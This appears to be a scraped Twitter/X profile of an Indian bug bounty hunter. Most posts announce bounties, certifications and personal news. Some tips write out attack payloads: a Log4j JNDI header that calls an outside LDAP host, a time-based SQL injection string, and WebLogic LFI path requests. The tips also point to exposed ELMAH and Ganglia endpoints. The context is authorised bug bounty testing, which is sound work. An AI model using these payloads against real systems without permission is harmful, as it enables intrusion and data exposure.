Ravindra Lakhara 🇮🇳 Profile Banner
Ravindra Lakhara 🇮🇳 Profile
Ravindra Lakhara 🇮🇳

@RootxRavi

Followers
3,707
Following
449
Media
337
Statuses
1,274

Building & | CRTP | eJPT | eCPPTv2 | eWPTX | eMAPT | SRT | Yogosha Top 20 Hacker | Bugcrowd Top 250 | Open for freelance projects

India
Joined October 2022
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@RootxRavi
Ravindra Lakhara 🇮🇳
4 months
A new Tool Added in @recon_sage ! Introducing Fast Subdomain Scanner 🚀 Scan subdomains for a domain in a click for FREE! Tool link in the comments:
21
70
272
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
Easy P1 🙃 1: Collect all the Js files by using the developer tool on mozila 2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool 3: Now check manually sensitive keyword js file #bugbounty #bugbountytips #security
Tweet media one
32
339
1K
@RootxRavi
Ravindra Lakhara 🇮🇳
4 months
Easy P1 🔥 Add to your wordlist /ganglia/ /ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2 #bugbountytips #bugbounty #security
Tweet media one
16
132
616
@RootxRavi
Ravindra Lakhara 🇮🇳
4 months
Log4j 🙌 Application was running java Vulnerable header : X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>} #BugBounty #bugbountytips #Security
Tweet media one
21
114
566
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
🙃 1: Gather all the POST parameters using @BurpBounty Pro Extension or using Param Miner Tool 2: Use SQLmap or intruder list on each parameter Payload : (select*from(select(sleep(5)))a) #bugbountytips #bugbounty #hacking #pentesting
Tweet media one
18
163
539
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Just scored a 4 Digit Bounty on @YogoshaOfficial 1 : Get all the URL from wayback / Gau 2 : Filter out the js file using httpx 3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension #BugBounty #bugbountytips
Tweet media one
18
110
411
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Oracle WebLogic Server LFI #Bogbounty #bugbountytips #bugbountytip Payload used : GET .//META-INF/MANIFEST.MF GET .//WEB-INF/web.xml GET .//WEB-INF/portlet.xml GET .//WEB-INF/weblogic.xml
Tweet media one
6
67
266
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Easy P1 😀 #bugbountytips #bugbounty Endpoint /elmah /ELMAH or you can use the below Template to find out the issue
Tweet media one
Tweet media two
6
56
259
@RootxRavi
Ravindra Lakhara 🇮🇳
11 months
Tweet media one
28
4
202
@RootxRavi
Ravindra Lakhara 🇮🇳
10 months
3 RCE on the VDP program - Found that the website is using the Oracle WebLogic Server - Nuclei template used: CVE-2019-2729.yaml - For exploitation: #BugBounty #bugbountytips #bugbountytip
Tweet media one
Tweet media two
11
47
197
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
Account Takeover Tricks via Password Reset #bugbountytips #BugBounty
Tweet media one
2
84
184
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Found 19 + LFI on Bugcrowd Program realize that SubDomain is OOS 🥵 #bugbounty #bugcrowd #testing
Tweet media one
8
16
158
@RootxRavi
Ravindra Lakhara 🇮🇳
10 months
it was nice meeting you bro @GodfatherOrwa 🥳❤️
Tweet media one
1
1
158
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
I and @0xAyub earned $1,000 for my submission on @bugcrowd #ItTakesACrowd #BugBounty No tip is needed for subdomain takeover pretty strate forward Vulnerability Template use for detection: http/takeovers/pantheon-takeover.yaml
Tweet media one
11
12
144
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Rewarded for RCE😂 #BugBounty #Security
Tweet media one
18
7
138
@RootxRavi
Ravindra Lakhara 🇮🇳
7 months
just started working on @recon_sage with @aniket_c333 , a platform to automate all your recon needs join the waitlist to get notified about early access! [waitlist link in comment] #buildinpublic #security #bugbounty
Tweet media one
7
19
138
@RootxRavi
Ravindra Lakhara 🇮🇳
1 month
Here we go, Weekend Stats: 1. P1: Auth Bypass 2. P3: Sensitive Document exposed (Private & Confidential) and JS file Data Leak 3. P4: Misconfiguration
Tweet media one
12
3
135
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
Tweet media one
3
51
130
@RootxRavi
Ravindra Lakhara 🇮🇳
7 months
Me & @krishnsec earned $$$ for IDOR submission on @bugcrowd #ItTakesACrowd Bug Name: IDOR allows unauthorized access to another user's profile image on https://xyz(.)com/api/v4/media/<ID-1111>/profileimage/ Simply substitute "ID" with "Victim ID" #BugBounty #security
8
8
125
@RootxRavi
Ravindra Lakhara 🇮🇳
9 months
@Jayesh25_ Wanted to add something here if the swagger instance is not vulnerable to XSS, go for the HTML Injection it will be accepted as P3/ P5 Paylaod
Tweet media one
3
21
120
@RootxRavi
Ravindra Lakhara 🇮🇳
5 months
Tweet media one
22
3
116
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
P1 Warrior ✅ @Bugcrowd
Tweet media one
10
1
112
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
Rewarded 3-digit Bounty for IDOR leads to Mass Username / Email Enumeration 1: I was testing the Forgot password page ( it was Developer Account ) 2: I got the password reset link in an email like this ( ) #bugbountytips #bugbounty #security
4
43
112
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Tweet media one
8
5
111
@RootxRavi
Ravindra Lakhara 🇮🇳
5 months
P1 Warrior Top 100 @Bugcrowd
Tweet media one
11
2
89
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
CVE-2022-47003 Mura CMS - Authentication Bypass Nuclei template : #bugbountytips #bugbountytip #Security #testing
Tweet media one
3
19
84
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
in June i have submitted 0 vulnerability and earn 0000 $ 🙂 #BugBounty
13
5
77
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
#Goalfor2023 1-Want to join @cobalt_io 2-100k bounty ( at least 10k bounty from @synack ) 3-More collaboration with @krishnsec ♥️ 4-Home for family 🏠 5-Focus on p1 ( Recon ) 6-Under 200 on @Bugcrowd 7- More bike trips with friends 🏍️ #BugBounty
4
6
79
@RootxRavi
Ravindra Lakhara 🇮🇳
6 months
Finally ☠️🫣
12
2
79
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Tweet media one
5
0
76
@RootxRavi
Ravindra Lakhara 🇮🇳
9 months
Tweet media one
7
0
67
@RootxRavi
Ravindra Lakhara 🇮🇳
5 days
I earned €400 for my submission on @YogoshaOfficial
Tweet media one
4
4
111
@RootxRavi
Ravindra Lakhara 🇮🇳
7 months
Tweet media one
13
2
70
@RootxRavi
Ravindra Lakhara 🇮🇳
2 months
Thank you, @Bugcrowd , for the awesome hoodie!
Tweet media one
Tweet media two
10
1
69
@RootxRavi
Ravindra Lakhara 🇮🇳
23 days
I earned €500 for my submission on @YogoshaOfficial
Tweet media one
4
2
65
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
I earned $2,000 for my submission on @bugcrowd #ItTakesACrowd
14
2
61
@RootxRavi
Ravindra Lakhara 🇮🇳
1 month
Thank you @synack @SynackRedTeam for the Awesome Swag 😎
Tweet media one
4
1
61
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Thank you @Bugcrowd
Tweet media one
3
0
57
@RootxRavi
Ravindra Lakhara 🇮🇳
2 months
I'm thrilled to announce that I've successfully passed the Certified Red Team Professional (CRTP) exam 🚀 I’m eager to leverage this expertise to enhance cybersecurity strategies and protect against emerging threats. thank you to @nikhil_mitt @alteredsecurity Security for course
Tweet media one
9
0
56
@RootxRavi
Ravindra Lakhara 🇮🇳
11 days
👀👀👀
Tweet media one
10
1
53
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
I earned $500 for my submission on @bugcrowd #ItTakesACrowd
4
0
50
@RootxRavi
Ravindra Lakhara 🇮🇳
4 months
Focus on your goal… Everything else is just a distraction!
3
2
50
@RootxRavi
Ravindra Lakhara 🇮🇳
9 months
Happy Birthday bhai ❤️❤️💯 @krishnsec Thanks for supporting and motivating me in Bug bounty #brocode #p4lover 😹
Tweet media one
11
2
51
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
P1 to P4 Sad life #BugBounty
Tweet media one
7
2
51
@RootxRavi
Ravindra Lakhara 🇮🇳
7 days
I’m happy to share that I’m starting a new position as Associate SME - Exposure Management at NetSentries Technologies!
18
0
53
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
I earned $450 for my submission on @bugcrowd #ItTakesACrowd
5
2
49
@RootxRavi
Ravindra Lakhara 🇮🇳
1 month
Another Duplicate 🫥
Tweet media one
6
0
44
@RootxRavi
Ravindra Lakhara 🇮🇳
8 months
Bhagwat Geeta Says: You have nothing to lose, Because Nothing is yours !
7
3
43
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
I earned $600 for my submission on @bugcrowd #ItTakesACrowd
6
1
39
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
Here we started Again @krishnsec Many more to Come 🔥 Rewarded 500$ on VDP For Weak/Default Credentials Username: user Password: pass #bugbountytips #bugbounty #security #infosec
1
0
20
@RootxRavi
Ravindra Lakhara 🇮🇳
19 days
Just got a reward for a vulnerability submitted on @yeswehack -- Improper Access Control - Generic (CWE-284). #YesWeRHackers
Tweet media one
2
1
40
@RootxRavi
Ravindra Lakhara 🇮🇳
3 months
The one i am using right now is gau or katana or waymore -> urldedupe -> qsreplace -> uro -> dalfox / knoxss #bugbountytips #bugbounty
@RootxRavi
Ravindra Lakhara 🇮🇳
3 months
@nav1n0x @xnl_h4ck3r @KN0X55 What tools you are using to extract the parameters?
0
0
2
0
6
39
@RootxRavi
Ravindra Lakhara 🇮🇳
11 months
which one is good for Bug bounty ? MAC or Windows?
43
0
38
@RootxRavi
Ravindra Lakhara 🇮🇳
8 months
Here we go Jujutsu Hackers @krishnsec @_MrSharma_ @udit_thakkur @walidhossain010 Congratulations 🥂😌
Tweet media one
5
2
38
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
I earned $400 for my submission on @bugcrowd #ItTakesACrowd
2
3
38
@RootxRavi
Ravindra Lakhara 🇮🇳
5 months
@Bugcrowd Triaged Speed 🙌🔥
Tweet media one
0
1
37
@RootxRavi
Ravindra Lakhara 🇮🇳
3 months
P1 Sabke Nikalenge, nikalenge unke jo yaha pe khada rahega 🤣🙌
8
2
37
@RootxRavi
Ravindra Lakhara 🇮🇳
10 months
here we go @krishnsec ❤️ Bhai mil kar jo maja aya hai na only @ReebootToInit5 can explain 🤪😜😜😜😝😝😝
Tweet media one
5
2
37
@RootxRavi
Ravindra Lakhara 🇮🇳
10 months
It was a pleasure meeting you bhaiya ❤️ @sagarparmar121
Tweet media one
1
0
34
@RootxRavi
Ravindra Lakhara 🇮🇳
11 months
In August Submitted 44 vulnerabilities on @Bugcrowd and rewarded $$$$ #BugBounty
6
0
34
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
I earned $200 for my submission on @bugcrowd #ItTakesACrowd
3
0
30
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Tweet media one
0
0
29
@RootxRavi
Ravindra Lakhara 🇮🇳
4 months
I'm pleased to announce that I've attained the Certified Multi-Cloud Red Teaming Analyst Badge from @cyberwarfarelab #cloudsecurity #cloud #AWS #GCP #azure
5
1
27
@RootxRavi
Ravindra Lakhara 🇮🇳
7 months
How many bugs are playing hide-and-seek, avoiding their resolution like masters of mischief? #BugBounty
Tweet media one
6
0
27
@RootxRavi
Ravindra Lakhara 🇮🇳
8 months
😂
Tweet media one
5
1
23
@RootxRavi
Ravindra Lakhara 🇮🇳
4 months
Subdomain Scanner: Please do check it out Any feedback is appreciated! 🙌 @aniket_c333 @Namancdr @recon_sage 🚀
2
5
22
@RootxRavi
Ravindra Lakhara 🇮🇳
5 months
Have you ever had an experience😂🥲 #bugbounty #security #bounty
6
0
23
@RootxRavi
Ravindra Lakhara 🇮🇳
8 months
Here we go 😍
@Bugcrowd
bugcrowd
8 months
Hacker Cup Week 2: Check out the latest standings for a glimpse into the exceptional skills driving the competition forward! 🏆 Top 8 teams: 𝟏: {"teamName":12345} 𝟐: Jujutsu Hackers 𝟑: Flysec 𝟒: TESS's Squad 𝟓: Tamil Pasanga 𝟔: Str4Hat Pirates 𝟕: The Boys 𝟖: ByteHunters
Tweet media one
Tweet media two
3
7
86
2
0
22
@RootxRavi
Ravindra Lakhara 🇮🇳
8 months
Kudos to Bsides Odisha for their quick decision upon the recent conflict raised due to the speaker’s past controversial tweet. Don’t spread hate 🩷🤟 @3ncryptSaan @bsidesodisha
1
1
21
@RootxRavi
Ravindra Lakhara 🇮🇳
9 months
@krishnsec this is fake 😇
Tweet media one
4
0
21
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Tweet media one
4
1
20
@RootxRavi
Ravindra Lakhara 🇮🇳
6 months
Podcast On @BountyAdvice : Bug Bounty Roast with @krishnsec and @ReebootToInit5
Yes
149
No
13
8
4
19
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
6: Bypassed the Rate limit mechanism using the Nullbyte & IP Rotate burp Extension #bugbountytips #bugbounty #security
0
5
19
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
I earned 100 euro for my submission on @YogoshaOfficial
1
0
19
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
Report Asi Karo ki 4 jan aake N/A marde 😂 #BugBounty
6
0
17
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
@Bugcrowd Doesn’t matter when ur bae is with you ♥️🫣😅
Tweet media one
2
0
17
@RootxRavi
Ravindra Lakhara 🇮🇳
1 year
dup or $$ 🙄
Tweet media one
5
0
17
@RootxRavi
Ravindra Lakhara 🇮🇳
2 months
I am at @BSidesMumbai lets catch up
Tweet media one
2
0
17
@RootxRavi
Ravindra Lakhara 🇮🇳
10 months
I love the program which gives bounty for P5😋 #bugbounty
2
0
17
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
Happy to share that I have provisionally passed the #eMAPT certification. Thanks, @eLearnSecurity & @ine really enjoyed the exam scenario of building vulnerable android applications from scratch to hack other vulnerable applications.
Tweet media one
2
0
16
@RootxRavi
Ravindra Lakhara 🇮🇳
6 days
Happy Guru Purnima! I'm forever grateful for the wisdom and inspiration my Gurus have given me. With immense gratitude, I celebrate the invaluable lessons learned from them. My deepest thanks to all my Gurus for guiding me. 🌠🌌
1
0
16
@RootxRavi
Ravindra Lakhara 🇮🇳
2 years
4
1
15
@RootxRavi
Ravindra Lakhara 🇮🇳
10 months
धर्मो रक्षति रक्षितः।
1
1
15
@RootxRavi
Ravindra Lakhara 🇮🇳
5 months
Har Har Mahadev 🕉️❤️
1
0
14
@RootxRavi
Ravindra Lakhara 🇮🇳
9 months
@krishnsec I even started with p4’s and even got lots bounty for cache control issue
3
0
14